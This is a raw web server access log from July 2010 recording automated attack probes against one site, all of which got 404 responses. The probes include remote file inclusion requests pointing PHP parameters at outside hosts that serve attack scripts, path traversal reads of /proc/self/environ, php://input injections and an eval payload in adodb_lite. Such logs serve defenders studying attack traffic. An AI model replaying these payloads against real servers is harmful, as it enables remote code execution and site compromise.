222.236.47.182 - - [23/Jul/2010:21:24:18 -0700] "GET /logs/access_100417.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:24:19 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:24:20 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:24:20 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:24:21 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:24:22 -0700] "GET /logs/access_100417.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:26:09 -0700] "GET /logs/access.log//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:26:09 -0700] "GET /logs//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:26:09 -0700] "GET /index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:26:09 -0700] "GET /index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:26:09 -0700] "GET /logs//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:26:10 -0700] "GET /logs/access.log//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:26:59 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:26:59 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:27:02 -0700] "GET /logs/access_100417.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:27:02 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:27:03 -0700] "GET /logs/access_100417.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:27:05 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:27:36 -0700] "GET /logs/access.log//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:27:37 -0700] "GET /logs//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:27:37 -0700] "GET /index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:27:37 -0700] "GET /index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:27:37 -0700] "GET /logs//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:27:38 -0700] "GET /logs/access.log//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:27:58 -0700] "GET /logs/access_100529.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:28:04 -0700] "GET /logs/access_100529.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:29:59 -0700] "GET /logs/access_100529.log//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:21:30:04 -0700] "GET /logs/access_100529.log//index2.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:17 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:17 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:18 -0700] "GET /logs/access_100417.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:19 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:20 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:21 -0700] "GET /logs/access_100529.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:30 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:32 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:34 -0700] "GET /logs/access_100529.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:31:44 -0700] "GET /logs/access_100529.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:32:38 -0700] "GET /logs/access_100417.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:32:48 -0700] "GET /logs/access_100417.log%20%20//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:36:03 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:36:03 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:36:05 -0700] "GET /logs/access_100619.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:39:47 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:39:48 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:39:49 -0700] "GET /logs/access_100417.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:40:07 -0700] "GET /logs/access_100529.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:40:20 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:40:20 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:40:23 -0700] "GET /logs/access_100619.log%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
209.116.59.107 - - [23/Jul/2010:21:43:46 -0700] "GET /logs/access_100306.log/bbs///write_comment_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:44:07 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:44:07 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:44:07 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:44:08 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:44:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:44:08 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:44:09 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:44:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:44:09 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:44:16 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:44:17 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:44:17 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:44:25 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:44:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:44:26 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.191.228.166 - - [23/Jul/2010:21:44:33 -0700] "GET /logs//poll/png.php?include_path=http://www.aconnect.ru/shop-script-premium-rus/data/osyid.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.getyourselfahorse.com"
88.191.228.166 - - [23/Jul/2010:21:44:33 -0700] "GET /poll/png.php?include_path=http://www.aconnect.ru/shop-script-premium-rus/data/osyid.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:44:44 -0700] "GET /logs/access_100619.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:44:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:44:45 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
93.125.99.2 - - [23/Jul/2010:21:44:55 -0700] "GET /poll/png.php?include_path=http://www.aconnect.ru/shop-script-premium-rus/data/osyid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
93.125.99.2 - - [23/Jul/2010:21:44:55 -0700] "GET /logs//poll/png.php?include_path=http://www.aconnect.ru/shop-script-premium-rus/data/osyid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
93.125.99.2 - - [23/Jul/2010:21:44:56 -0700] "GET /logs//poll/png.php?include_path=http://www.aconnect.ru/shop-script-premium-rus/data/osyid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
93.125.99.2 - - [23/Jul/2010:21:44:56 -0700] "GET /poll/png.php?include_path=http://www.aconnect.ru/shop-script-premium-rus/data/osyid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:45:12 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:45:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:45:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:21:45:36 -0700] "GET /logs/access_100619.log/index.php?pilih=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:21:45:42 -0700] "GET /logs/access_100619.log/index.php?pilih=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:45:44 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:45:45 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:21:45:47 -0700] "POST /logs/access_100619.log/index.php?pilih=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:45:51 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:21:45:52 -0700] "GET /index.php?pilih=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:21:45:57 -0700] "GET /index.php?pilih=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:21:46:02 -0700] "POST /index.php?pilih=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:21:46:07 -0700] "GET /logs/index.php?pilih=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:21:46:12 -0700] "GET /logs/index.php?pilih=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
216.59.16.66 - - [23/Jul/2010:21:46:17 -0700] "POST /logs/index.php?pilih=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:46:34 -0700] "GET /logs/access_100619.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
209.116.59.107 - - [23/Jul/2010:21:46:45 -0700] "GET /logs/access_100313.log/bbs///write_comment_update.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.125.99.2 - - [23/Jul/2010:21:49:16 -0700] "GET /logs/access_100529.log//poll/png.php?include_path=http://www.aconnect.ru/shop-script-premium-rus/data/osyid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
93.125.99.2 - - [23/Jul/2010:21:49:17 -0700] "GET /logs/access_100529.log//poll/png.php?include_path=http://www.aconnect.ru/shop-script-premium-rus/data/osyid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:50:58 -0700] "GET /logs/access_100710.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:51:00 -0700] "GET /logs/access_100710.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [23/Jul/2010:21:51:20 -0700] "GET /logs/access_100710.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:21:51:35 -0700] "GET /logs/access_100619.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.155.9.169 - - [23/Jul/2010:21:52:04 -0700] "GET /logs/access_100612.logib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
122.155.9.169 - - [23/Jul/2010:21:52:05 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
122.155.9.169 - - [23/Jul/2010:21:52:05 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:53:51 -0700] "GET /logs/access_100710.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:53:53 -0700] "GET /logs/access_100710.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [23/Jul/2010:21:54:07 -0700] "GET /logs/access_100710.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.191.228.166 - - [23/Jul/2010:21:54:09 -0700] "GET /logs/access_100529.log//poll/png.php?include_path=http://www.aconnect.ru/shop-script-premium-rus/data/osyid.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.getyourselfahorse.com"
122.155.9.169 - - [23/Jul/2010:22:03:32 -0700] "GET /phphtml.php?htmlclass_path=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
122.155.9.169 - - [23/Jul/2010:22:03:33 -0700] "GET /logs/phphtml.php?htmlclass_path=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "getyourselfahorse.com"
222.236.47.182 - - [23/Jul/2010:22:06:38 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.britak.co.ke//images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:22:09:00 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:22:09:00 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:22:09:00 -0700] "GET /logs/access_100522.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:22:09:07 -0700] "GET /logs/access_100403.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:22:09:24 -0700] "GET /logs/access_100522.log%20%20/includes/ktedit/toolbar.php?dirDepth=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
217.195.185.200 - - [23/Jul/2010:22:09:24 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.herzfeuer.eu/artwerk/sh/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
